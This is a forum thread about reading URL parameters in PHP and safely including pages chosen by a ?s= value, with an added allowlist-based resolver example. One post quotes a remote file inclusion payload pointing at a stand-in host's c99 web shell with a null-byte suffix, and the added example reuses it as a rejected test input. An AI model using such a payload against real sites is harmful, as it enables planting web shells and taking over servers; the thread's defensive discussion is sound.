• how do i use url parameters?
    38 replies, posted
[QUOTE=Wipmuck;19314295]rm = unix/linux command for remove -f skips any prompts -r deletes all the files in the dir[/QUOTE] Sorry, it's actually remove all files recursively.
[QUOTE=turby;19317993]-r = recursive IIRC [editline]04:57PM[/editline] crapscript.php?s=http://evilsite.com/c99.php%00 bam, remote file inclusion right there[/QUOTE] Nope, unless the remote server's php configuration allows remote scripts to include their files, then you won't have an issue, however; I did neglect to add protection from ../ in that example. So, here:
[php]
<?php
$site = $_GET['s']; // Gets the site from the url ex. ?s=this
$site = str_replace('../', ' ', $site, $count); // Replace ../ with a whitespace and set the number of instances replaced to int $count
if(!$count){ // Continue only if nothing was replaced ($count is 0)
    if(file_exists($site .'.html')){ // If the html file for the site exists
        include($site .'.html'); // Include the file
    }
    else{ // If the file doesn't exist
        die("File not found.."); // Stop running the php file, and print "File not found.."
    }
}
else{
    die("Invalid Page"); // Stop running the php file if they have put ?s=../somefile.html
}
?>
[/php]
Why would you replace it with a space, why not use ""?
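An allowlist-based take on the include-by-`?s=` script discussed above, as an added example that is not part of any post in the thread. `resolve_page()` and the temporary pages directory are hypothetical names, and the sample inputs are constructed from the values quoted in the thread.

```php
<?php
// Added example: map a ?s= value to a file inside one pages directory, or refuse.
// resolve_page() and the directory layout are assumptions, not from the thread.

function resolve_page(string $baseDir, string $requested): ?string
{
    // 1. Accept only a short name of letters, digits, '-' and '_'. This alone
    //    rejects URLs, "../", slashes, dots and NUL bytes, so nothing needs
    //    to be stripped or replaced afterwards.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    // 2. Canonicalise and confirm the file sits directly inside $baseDir
    //    (this also catches a symlink that points somewhere else).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.html');
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    return dirname($path) === $base ? $path : null;
}

// Constructed demo: a temporary pages directory holding one page.
$pages = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($pages, 0700);
file_put_contents($pages . DIRECTORY_SEPARATOR . 'home.html', "<h1>Home</h1>\n");

$inputs = [
    'home',                           // valid page
    'missing',                        // well-formed name, no such file
    '../somefile',                    // traversal case from the post above
    "http://evilsite.com/c99.php\0",  // quoted URL with the %00 decoded
];
foreach ($inputs as $s) {
    $file = resolve_page($pages, $s);
    printf("%-40s => %s\n", json_encode($s),
        $file === null ? 'rejected' : 'serve ' . basename($file));
}

// Remove the constructed demo files again.
unlink($pages . DIRECTORY_SEPARATOR . 'home.html');
rmdir($pages);
```

For static HTML pages, pass the returned path to `readfile()` rather than `include`, so the file's contents are sent as-is and never executed as PHP.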
People, why are you still bumping this thread? I got the help I requested.
[QUOTE=no-named;19339141]People, why are you still bumping this thread? I got the help I requested.[/QUOTE] Because you don't own the forum, nor control what happens. I was asking a question.
Am I the only one always having trouble directly specifying GET data, without checking if it exists first? Without decent error reporting, I believe you'd have to do something like this
[php]
<?php
$strGetData = "";
if (isset($_GET["getdata"]))
    $strGetData = $_GET["getdata"];
if ($strGetData != "") {
    echo $strGetData;
}
?>
[/php]
Feel free to correct me if I'm wrong on this.
[php]
<?php
if(isset($_GET['data']) && !empty($_GET['data'])){
    echo $_GET['data'];
}
?>
[/php]
emptyempty() == empty().
[QUOTE=compwhiziitothemax;19301998]How that piece of code is even working is beyond me.[/QUOTE] PHP has this "nice feature" that unknown constants emit a notice (or warning?), and then evaluate to the name of the constant. With . as the string concatenation operator, this code is basically include $site . 'html'; Don't we all love PHP? :sigh:
[QUOTE=itsbth;19451904]PHP has this "nice feature" that unknown constants emit a notice (or warning?), and then evaluate to the name of the constant. With . as the string concatenation operator, this code is basically include $site . 'html'; Don't we all love PHP? :sigh:[/QUOTE] :psyboom: